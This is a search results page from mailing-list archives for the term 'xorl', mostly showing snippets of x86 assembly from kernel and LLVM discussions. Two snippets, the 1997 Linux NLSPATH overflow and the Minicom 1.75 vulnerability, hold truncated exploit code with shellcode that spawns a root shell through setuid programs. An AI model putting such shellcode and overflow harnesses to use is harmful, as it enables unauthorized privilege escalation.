Displaying 20 results from an estimated 278 matches for "xorl".
2017 Oct 20
1
[PATCH v1 01/27] x86/crypto: Adapt assembly for PIE support
...ENDPROC(FUNC);
>>
>> +#define round_mov(tab_off, reg_i, reg_o) \
>> + leaq tab_off(%rip), RBASE; \
>> + movl (RBASE,reg_i,4), reg_o;
>> +
>> +#define round_xor(tab_off, reg_i, reg_o) \
>> + leaq tab_off(%rip), RBASE; \
>> + xorl (RBASE,reg_i,4), reg_o;
>> +
>> #define round(TAB,OFFSET,r1,r2,r3,r4,r5,r6,r7,r8,ra,rb,rc,rd) \
>> movzbl r2 ## H,r5 ## E; \
>> movzbl r2 ## L,r6 ## E; \
>> - movl TAB+1024(,r5,4),r5 ## E;\
>> + round_mov(TAB+1024, r5, r...
2017 Oct 20
0
[PATCH v1 01/27] x86/crypto: Adapt assembly for PIE support
...12(r9); \
> + popq RBASE; \
> ret; \
> ENDPROC(FUNC);
>
> +#define round_mov(tab_off, reg_i, reg_o) \
> + leaq tab_off(%rip), RBASE; \
> + movl (RBASE,reg_i,4), reg_o;
> +
> +#define round_xor(tab_off, reg_i, reg_o) \
> + leaq tab_off(%rip), RBASE; \
> + xorl (RBASE,reg_i,4), reg_o;
> +
> #define round(TAB,OFFSET,r1,r2,r3,r4,r5,r6,r7,r8,ra,rb,rc,rd) \
> movzbl r2 ## H,r5 ## E; \
> movzbl r2 ## L,r6 ## E; \
> - movl TAB+1024(,r5,4),r5 ## E;\
> + round_mov(TAB+1024, r5, r5 ## E)\
> movw r4 ## X,r2 ## X; \
> - movl TAB(,r6,4)...
2014 Jan 18
2
[LLVMdev] Scheduling quirks
...owing result:
===>
.file "test.cpp"
.text
.globl _Z13test_registeri
.align 16, 0x90
.type _Z13test_registeri,@function
_Z13test_registeri: # @_Z13test_registeri
.cfi_startproc
# BB#0: # %entry
movl %edi, %eax
sarl $2, %eax
xorl %edi, %eax
movl %eax, %ecx
sarl $3, %ecx
xorl %eax, %ecx
movl %ecx, %edx
sarl $4, %edx
xorl %ecx, %edx
movl %edx, %eax
sarl $5, %eax
xorl %edx, %eax
retq
.Ltmp0:
.size _Z13test_registeri, .Ltmp0-_Z13test_registeri
.cfi_endproc
.globl _Z14test_scheduleri
.align 16, 0x90
.type _Z14tes...
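For reference, the shift-xor chain in the listing corresponds to source along these lines (a reconstruction inferred from the instruction sequence; the thread's actual test.cpp is not shown in this excerpt):

int test_register(int x)
{
    x ^= x >> 2;   /* movl %edi,%eax; sarl $2,%eax; xorl %edi,%eax */
    x ^= x >> 3;   /* each step copies, arithmetic-shifts, then xorl's */
    x ^= x >> 4;
    x ^= x >> 5;
    return x;
}

Each xorl consumes the result of the sarl before it, so the chain is fully serial; that data dependence is what makes the scheduling of this sequence interesting.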
2019 Aug 15
2
Slow XCHG in arch/i386/libgcc/__ashrdi3.S and arch/i386/libgcc/__lshrdi3.S
...oth
https://git.kernel.org/pub/scm/libs/klibc/klibc.git/plain/usr/klibc/arch/i386/libgcc/__ashldi3.S
and
https://git.kernel.org/pub/scm/libs/klibc/klibc.git/plain/usr/klibc/arch/i386/libgcc/__lshrdi3.S
use the following code sequences for shift counts greater than 31:

1:                              1:
        xorl    %edx,%edx               shrl    %cl,%edx
        shl     %cl,%eax                xorl    %eax,%eax
                 ^
        xchgl   %edx,%eax               xchgl   %edx,%eax
        ret                             ret
At least and especially on Intel processors XCHG was and
still is a rather slow instruction and should be avoided.
Use...
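The xchg-free shape of the fix, sketched as GNU C inline asm (an illustration of producing each half of the result directly in its destination register, not necessarily the patch the thread settled on; on i386 the 64-bit value lives in %eax:%edx and the count in %cl):

/* Logical right shift of a 64-bit value for counts >= 32:
   low word = high word >> (count-32), high word = 0. */
unsigned long long lshr_ge32(unsigned int hi, unsigned char count)
{
    unsigned int lo;
    __asm__("shrl %%cl, %0"            /* shrl masks the count to 5 bits,
                                          so count >= 32 acts as count-32 */
            : "=r"(lo)
            : "0"(hi), "c"(count));
    return lo;                         /* high word is simply zero */
}

Building each half directly in its final register makes the trailing xchgl %edx,%eax unnecessary, which addresses the slowness the post describes.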
2018 Aug 06
4
[Release-testers] [7.0.0 Release] rc1 has been tagged
On Sun, Aug 5, 2018 at 5:49 PM, Dimitry Andric <dimitry@andric.com> wrote:
> On 3 Aug 2018, at 13:37, Hans Wennborg via Release-testers <release-testers@lists.llvm.org> wrote:
>>
>> 7.0.0-rc1 was just tagged (from the branch at r338847).
>>
>> It's early in the release process, but I'd like to find out what the
>> status is of the branch
2017 Oct 11
1
[PATCH v1 01/27] x86/crypto: Adapt assembly for PIE support
...## E,4(r9); \
movl r7 ## E,8(r9); \
movl r8 ## E,12(r9); \
+ popq RBASE; \
ret; \
ENDPROC(FUNC);
+#define round_mov(tab_off, reg_i, reg_o) \
+ leaq tab_off(%rip), RBASE; \
+ movl (RBASE,reg_i,4), reg_o;
+
+#define round_xor(tab_off, reg_i, reg_o) \
+ leaq tab_off(%rip), RBASE; \
+ xorl (RBASE,reg_i,4), reg_o;
+
#define round(TAB,OFFSET,r1,r2,r3,r4,r5,r6,r7,r8,ra,rb,rc,rd) \
movzbl r2 ## H,r5 ## E; \
movzbl r2 ## L,r6 ## E; \
- movl TAB+1024(,r5,4),r5 ## E;\
+ round_mov(TAB+1024, r5, r5 ## E)\
movw r4 ## X,r2 ## X; \
- movl TAB(,r6,4),r6 ## E; \
+ round_mov(TAB, r6, r6 ## E...
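The pattern the diff applies throughout, restated as GNU C inline asm (an illustrative sketch, not the kernel macro; the table symbol and operand choices here are stand-ins): an absolute-indexed load such as movl TAB(,reg,4) embeds a 32-bit absolute address, which a position-independent kernel cannot relocate, so the table base is first materialized PC-relatively with leaq and the same scaled-index load goes through it:

unsigned int table[256];   /* stand-in for the AES lookup tables */

unsigned int table_load_pie(unsigned long idx)
{
    unsigned long base;
    unsigned int out;
    __asm__("leaq table(%%rip), %0\n\t"   /* base = &table, RIP-relative */
            "movl (%0,%2,4), %1"          /* out = table[idx], same indexed form */
            : "=&r"(base), "=r"(out)
            : "r"(idx));
    return out;
}

The cost, visible in the diff, is one extra leaq per lookup plus a scratch register (RBASE), which is why the diff also adds a popq RBASE before the ret.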
2019 Aug 20
1
Slow XCHG in arch/i386/libgcc/__ashrdi3.S and arch/i386/libgcc/__lshrdi3.S
...t/plain/usr/klibc/arch/i386/libgcc/__ashldi3.S
>> and
>> https://git.kernel.org/pub/scm/libs/klibc/klibc.git/plain/usr/klibc/arch/i386/libgcc/__lshrdi3.S
>> use the following code sequences for shift counts greater than 31:
>>
>> 1:                              1:
>>         xorl    %edx,%edx               shrl    %cl,%edx
>>         shl     %cl,%eax                xorl    %eax,%eax
>>                  ^
>>         xchgl   %edx,%eax               xchgl   %edx,%eax
>>         ret                             ret
>>
>> At least and especially on Intel processors XCHG was and
>>...
2015 Sep 01
2
[RFC] New pass: LoopExitValues
...*Src, unsigned int Val) {
for (int Outer = 0; Outer < Size; ++Outer)
for (int Inner = 0; Inner < Size; ++Inner)
Dst[Outer * Size + Inner] = Src[Outer * Size + Inner] * Val;
}
With LoopExitValues
-------------------------------
matrix_mul:
testl %edi, %edi
je .LBB0_5
xorl %r9d, %r9d
xorl %r8d, %r8d
.LBB0_2:
xorl %r11d, %r11d
.LBB0_3:
movl %r9d, %r10d
movl (%rdx,%r10,4), %eax
imull %ecx, %eax
movl %eax, (%rsi,%r10,4)
incl %r11d
incl %r9d
cmpl %r11d, %edi
jne .LBB0_3
incl %r8d
cmpl %edi, %r8d
jne .LBB0_2
.LBB0_5:...
2015 Aug 31
2
[RFC] New pass: LoopExitValues
Hello LLVM,
This is a proposal for a new pass that improves performance and code
size in some nested loop situations. The pass is target independent.
From the description in the file header:
This optimization finds loop exit values reevaluated after the loop
execution and replaces them by the corresponding exit values if they
are available. Such sequences can arise after the
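Hand-applying the idea to the matrix_mul example from the previous result (a sketch of the effect, not the pass's actual output; the signature is reconstructed from the excerpt): the flat index reached at inner-loop exit, Outer*Size + Size, is exactly the first index of the next outer iteration, so it can be carried forward instead of recomputing Outer*Size each time:

void matrix_mul(int Size, unsigned int *Dst, const unsigned int *Src,
                unsigned int Val)
{
    int Flat = 0;                       /* carries the inner loop's exit value */
    for (int Outer = 0; Outer < Size; ++Outer)
        for (int Inner = 0; Inner < Size; ++Inner, ++Flat)
            Dst[Flat] = Src[Flat] * Val;
}

This is visible in the assembly above: the flat index in %r9d is never rebuilt from Outer*Size, it just keeps incrementing across both loop levels.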
1997 Feb 14
0
Linux NLSPATH buffer overflow (fwd)
...12);
memcpy(&buffer[512], shellcode, strlen(shellcode));
buffer[bufsize - 1] = 0;
setenv("NLSPATH", buffer, 1);
execl("/bin/su", "/bin/su", NULL);
}
--- nlspath.c ---
And the shellcode separately:
--- shellcode.s ---
.text
.globl shellcode
shellcode:
xorl %eax,%eax
movb $0x31,%al
int $0x80
xchgl %eax,%ebx
xorl %eax,%eax
movb $0x17,%al
int $0x80
.byte 0x68
popl %ecx
popl %eax
jmp *%ecx
call *%esp
xorl %eax,%eax
cltd
movl %ecx,%edi
movb $'/'-1,%al
incl %eax
scasb %es:(%edi),%al
jne -3
movl %edi,(%ecx)
movl %edx,4(%ecx)
movl %edi,%ebx...
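A side note on why exploit payloads zero registers with xorl rather than a move-immediate (a gloss on the listing above, not part of the original advisory): the payload is delivered through string handling, so its encoding must avoid 0x00 bytes, and xorl %eax,%eax encodes as 31 c0 while movl $0,%eax encodes as b8 00 00 00 00. A quick check:

#include <stdio.h>

static const unsigned char xor_zero[]  = {0x31, 0xc0};                   /* xorl %eax,%eax */
static const unsigned char movl_zero[] = {0xb8, 0x00, 0x00, 0x00, 0x00}; /* movl $0,%eax   */

static int has_nul(const unsigned char *p, unsigned n)
{
    while (n--)
        if (*p++ == 0x00)
            return 1;                   /* a 0x00 byte would cut the string short */
    return 0;
}

int main(void)
{
    printf("xorl idiom has NUL: %d\n", has_nul(xor_zero, sizeof xor_zero));    /* 0 */
    printf("movl $0 has NUL:    %d\n", has_nul(movl_zero, sizeof movl_zero));  /* 1 */
    return 0;
}

The same constraint explains the movb $0x31,%al form in the shellcode: a byte-sized immediate avoids the zero padding a 32-bit immediate would carry.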
2016 Nov 17
4
RFC: Insertion of nops for performance stability
...4 28 movq 40(%rsp), %rax
5: 8b 00 movl (%rax), %eax
7: 01 c8 addl %ecx, %eax
9: 44 39 c0 cmpl %r8d, %eax
c: 75 0f jne 15 <foo+0x1D>
e: ff 05 00 00 00 00 incl (%rip)
14: ff 05 00 00 00 00 incl (%rip)
1a: 31 c0 xorl %eax, %eax
1c: c3 retq
1d: 44 39 c9 cmpl %r9d, %ecx
20: 74 ec je -20 <foo+0xE>
22: 48 8b 44 24 30 movq 48(%rsp), %rax
27: 2b 08 subl (%rax), %ecx
29: 39 d1 cmpl %edx, %ecx
2b: 7f e1 jg -31 <foo+0xE>
2d:...
2019 Aug 19
0
Slow XCHG in arch/i386/libgcc/__ashrdi3.S and arch/i386/libgcc/__lshrdi3.S
.../scm/libs/klibc/klibc.git/plain/usr/klibc/arch/i386/libgcc/__ashldi3.S
> and
> https://git.kernel.org/pub/scm/libs/klibc/klibc.git/plain/usr/klibc/arch/i386/libgcc/__lshrdi3.S
> use the following code sequences for shift counts greater than 31:
>
> 1:                              1:
>         xorl    %edx,%edx               shrl    %cl,%edx
>         shl     %cl,%eax                xorl    %eax,%eax
>                  ^
>         xchgl   %edx,%eax               xchgl   %edx,%eax
>         ret                             ret
>
> At least and especially on Intel processors XCHG was and
> still is a rather slow inst...
2012 Mar 28
2
[LLVMdev] Suboptimal code due to excessive spilling
...mp14:
.cfi_def_cfa_offset 12
pushl %esi
.Ltmp15:
.cfi_def_cfa_offset 16
subl $88, %esp
.Ltmp16:
.cfi_def_cfa_offset 104
.Ltmp17:
.cfi_offset %esi, -16
.Ltmp18:
.cfi_offset %edi, -12
.Ltmp19:
.cfi_offset %ebx, -8
pxor %xmm0, %xmm0
movl 112(%esp), %eax
testl %eax, %eax
je .LBB1_3
# BB#1:
xorl %ebx, %ebx
movl 108(%esp), %ecx
movl 104(%esp), %edx
xorl %esi, %esi
.align 16, 0x90
.LBB1_2: # %.lr.ph.i
# =>This Inner Loop Header: Depth=1
movsd (%edx,%ebx,8), %xmm2
addsd .LCPI1_0, %xmm2
movsd 16(%edx,%ebx,8), %xmm...
2012 Apr 05
0
[LLVMdev] Suboptimal code due to excessive spilling
...mp14:
.cfi_def_cfa_offset 12
pushl %esi
.Ltmp15:
.cfi_def_cfa_offset 16
subl $88, %esp
.Ltmp16:
.cfi_def_cfa_offset 104
.Ltmp17:
.cfi_offset %esi, -16
.Ltmp18:
.cfi_offset %edi, -12
.Ltmp19:
.cfi_offset %ebx, -8
pxor %xmm0, %xmm0
movl 112(%esp), %eax
testl %eax, %eax
je .LBB1_3
# BB#1:
xorl %ebx, %ebx
movl 108(%esp), %ecx
movl 104(%esp), %edx
xorl %esi, %esi
.align 16, 0x90
.LBB1_2: # %.lr.ph.i
# =>This Inner Loop Header: Depth=1
movsd (%edx,%ebx,8), %xmm2
addsd .LCPI1_0, %xmm2
movsd 16(%edx,%ebx,8), %xmm...
1997 Feb 09
0
Minicom 1.75 Vulnerability
...h>
#include <string.h>
#include <stdarg.h>
#define NOP 0x90
const char usage[] = "usage: %s stack-offset buffer-size argv0 argv1 ...\n";
extern code();
void dummy( void )
{
extern lbl();
/* do "exec( "/bin/sh" ); exit(0)" */
__asm__( "
code: xorl %edx, %edx
pushl %edx
jmp lbl
start2: movl %esp, %ecx
popl %ebx
movb %edx, 0x7(%ebx)
xorl %eax, %eax
movb $0xB, %eax
int $0x80
xorl %ebx, %ebx
xorl %eax, %eax
inc %eax
int $0x80
lbl: call start2
.string \"/bin/sh\"
");
}
void Fatal( int rv, const char *fmt, ... )
{
va...
2009 Jan 15
2
[LLVMdev] Testcase for OS kernel
...struct a;
struct a_struct *pa;
__asm__ __volatile__(
"1: movl 0(%2),%%eax\n"
"2: movl 4(%2),%%edx\n"
"3:\n" ".section .fixup,\"ax\"\n"
"4: movl %3,%0\n"
" xorl %%eax,%%eax\n"
" xorl %%edx,%%edx\n"
" jmp 3b\n" ".previous\n"
".section __ex_table,\"a\"\n"
" .align 4\n"
" .long 1b,4b\n"
" .long...
2011 Dec 14
2
[LLVMdev] Failure to optimize ? operator
...he given function.
So always T(f1) <= T(f2).
I would call this a missed optimization opportunity. I think it
warrants a bug report.
If I do the same experiment with gcc I get identical code for the two functions:
==============================================
_f1:
        pushl   %ebp
        xorl    %eax, %eax
        movl    %esp, %ebp
        movl    8(%ebp), %edx
        testl   %edx, %edx
        jle     L5
        popl    %ebp
        ret
        .p2align 4,,7
L5:
        movl    %edx, %ecx
        imull   %edx, %ecx
        popl    %ebp
        leal    3(%ecx,%ecx,4), %eax
        imull   %edx, %eax
        leal    1(...
2007 Oct 19
2
[LLVMdev] llvm_fcmp_ord and llvm_fcmp_uno and assembly code generation
...turn X != X || Y != Y; }
int x(double X, double Y)
{
return llvm_fcmp_uno(X,Y);
}
int xx(double X, double Y)
{
return isunordered(X, Y);
}
$ gcc -std=c99 -O3 -S x.c -o x.gcc.s
$ llvm-gcc -std=c99 -O3 -S x.c -o x.llvm.s
x.gcc.s:
x:
.LFB7:
movl $1, %eax
ucomisd %xmm0, %xmm0
jne .L5
jp .L5
xorl %eax, %eax
ucomisd %xmm1, %xmm1
setp %al
.L5:
rep ; ret
.LFE7:
.size x, .-x
.p2align 4,,15
.globl xx
.type xx, @function
xx:
.LFB8:
xorl %eax, %eax
ucomisd %xmm1, %xmm0
setp %al
ret
x.llvm.s:
x:
pxor %xmm2, %xmm2
ucomisd %xmm2, %xmm0
setp %al
ucomisd %xmm2, %xmm1
setp %cl
orb %al,...
2011 Feb 26
2
[LLVMdev] TableGen syntax for matching a constant load
...e the performance impact of doing this. You
> are creating a false dependency on the last instruction to write %eax,
> and the CPU won't be able to execute the following instructions in
> parallel.
I am primarily interested in size here, not speed.
> You may want to consider using xorl+decl instead. It is also three
> bytes, and there are no false dependencies. The xor idiom is recognized
> by processors as old as Pentium 4 as having no dependencies.
Any examples of how to create more than one instruction for a given
pattern? There are some other cases I could use this fo...
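The trade-off under discussion, restated as GNU C inline asm (an illustration only; the thread is about expressing this in TableGen, and the instruction that drew the warning is not shown in this excerpt, so orl $-1 stands in for a read-modify-write way of setting a register to -1). On i386 both sequences are three bytes, since decl %eax encodes in a single byte there:

int minus_one_rmw(void)
{
    int r = 0;
    __asm__("orl $-1, %0" : "+a"(r));    /* 83 c8 ff: reads %eax, so it carries
                                            a false dependency on its last writer */
    return r;
}

int minus_one_xor_dec(void)
{
    int r;
    __asm__("xorl %0, %0\n\t"            /* 31 c0: zeroing idiom, recognized as
                                            dependency-free since the Pentium 4 */
            "decl %0"                    /* 48 on i386 (ff c8 on x86-64) */
            : "=a"(r));
    return r;
}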